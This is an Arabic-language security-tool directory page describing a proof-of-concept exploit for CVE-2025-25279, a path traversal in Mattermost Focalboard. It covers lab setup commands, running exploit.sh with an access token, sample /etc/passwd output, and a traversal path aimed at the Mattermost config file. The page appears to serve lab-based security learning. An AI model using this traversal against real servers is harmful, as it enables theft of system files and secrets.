Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-25279-Mattermost-Path-Traversal — استغلال إثبات مفهوم لـ CVE-2025-25279، ثغرة اجتياز المسار في Mattermost Focalboard تتيح قراءة ملفات تعسفية مصادق عليها وسرقة ملفات حساسة. | Kitploit
أدوات/GitHubGitHub/abokormahammadmousse/cve-2025-25279-mattermost-path-traversal
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubabokormahammadmousse/cve-2025-25279-mattermost-path-traversal

CVE-2025-25279-Mattermost-Path-Traversal

استغلال إثبات مفهوم لـ CVE-2025-25279، ثغرة اجتياز المسار في Mattermost Focalboard تتيح قراءة ملفات تعسفية مصادق عليها وسرقة ملفات حساسة.

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🔥 CVE-2025-25279 — Mattermost 10.4.1

📤 تجاوز المسار في Focalboard يتيح استخراج الملفات

🌟 مقدمة

تُظهر هذه الإثبات العملي استغلال الثغرة CVE-2025-25279 التي تؤثر على Mattermost 10.4.1.
يسمح وجود خلل في Focalboard (وحدة إدارة اللوحات) بـ قراءة عشوائية للملفات عبر تجاوز المسار في المرفقات.

يُمكّن الاستغلال من استخراج:

  • /etc/passwd
  • /etc/group
  • أو ملفات حساسة لـ Mattermost، على سبيل المثال:
    opt/mattermost/config/config.json

يعمل الهجوم فقط باستخدام حساب مستخدم مُصادق عليه في السيناريوهات الضعيفة.


🗂️ تنظيم الدلائل

  • 📁 target : دليل إنشاء الصندوق الهدف
  • 📁 live : دليل إنشاء الأجهزة الافتراضية الهدف وعرض الاستغلال
  • 📁 src : كود مصدر مساعد (إن وُجد)
  • 📁 refs : دليل يحوي المقالات والمراجع
  • 📁 docs : المستندات المرتبطة المُنتجة أثناء المشروع، بما في ذلك التسجيلات المرئية

  • 🔧 المتطلبات الأساسية

    • Vagrant
    • VirtualBox
    • مجموعة ملفات المشروع (target + live)
    • حساب Mattermost (PAT = Personal Access Token)
    • لينكس/ماك/ويندوز مع Bash

    📦 تحميل Mattermost

    المجلد target/ غير مضمن (كبير جدًا لـ GitHub).

    حمّله يدويًا من: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz

    ثم ضع الملف في: target

    قبل نشر الجهاز الافتراضي

    أولاً، اذهب إلى دليل target ونفّذ:

    root@kitploit:~
    cd target
    make mattermost.box
    

    تأكد من وجود box mattermost-poc وإلا لن يعمل الجهاز الافتراضي:

    root@kitploit:~
    cd cve-2025-25279-mattermost
    vagrant box add mattermost-poc target/mattermost.box
    

    1. نشر الجهاز الهدف الضعيف

    تشغيل الجهاز الافتراضي

    root@kitploit:~
    cd live/vm1
    vagrant up
    

    الاتصال بالجهاز الافتراضي

    root@kitploit:~
     vagrant ssh
    

    إنشاء مستخدم في الواجهة الويب:

    افتح: http://localhost:8065

    إنشاء رمز مميز في واجهة المستخدم:

    الملف الشخصي --> الأمان --> رموز الوصول الشخصية

    2. تثبيت الاستغلال

    من الجهاز المضيف:

    root@kitploit:~
    cd live/share
    sudo apt-get update -y
    sudo apt-get install -y unzip
    
    chmod +x exploit.sh
    
    

    3. تنفيذ الاستغلال

    root@kitploit:~
    ./exploit.sh
    

    سيُطلب منك:

    root@kitploit:~
    PAT (Personal Access Token) :
    

    👉 أدخل رمز PAT صالحًا لمستخدم Mattermost.

    📸 مثال على المخرجات (استخراج /etc/passwd)

    root@kitploit:~
    ===== CONTENU (début) =====
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    ...
    mattermost:x:999:996::/opt/mattermost:/bin/sh
    

    الملف المستهدف: config.json

    لاستهداف ملف Mattermost حساس:

    عدّل في أعلى السكربت exploit.sh:

    root@kitploit:~
    TARGET_SUFFIX="opt/mattermost/config/config.json"
    TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
    سيعرض الاستغلال بعد ذلك محتوى ملف config.json.
    

    ✒️ المؤلفون

    🟢 محمد موسى أبو بكر 🔵 سيريل بارنيه

    🎬 عرض فيديو

    👉 يوجد عرض توضيحي كامل بالفيديو في: live/Démonstration/video-poc-cve-2025-25279.mp4

    🧩 ملاحظات

    هذا الإثبات العملي مخصص فقط لبيئات التعلم. لا يُستخدم أبدًا خارج الإطار التعليمي أو بدون إذن.

    تنزيل الأداة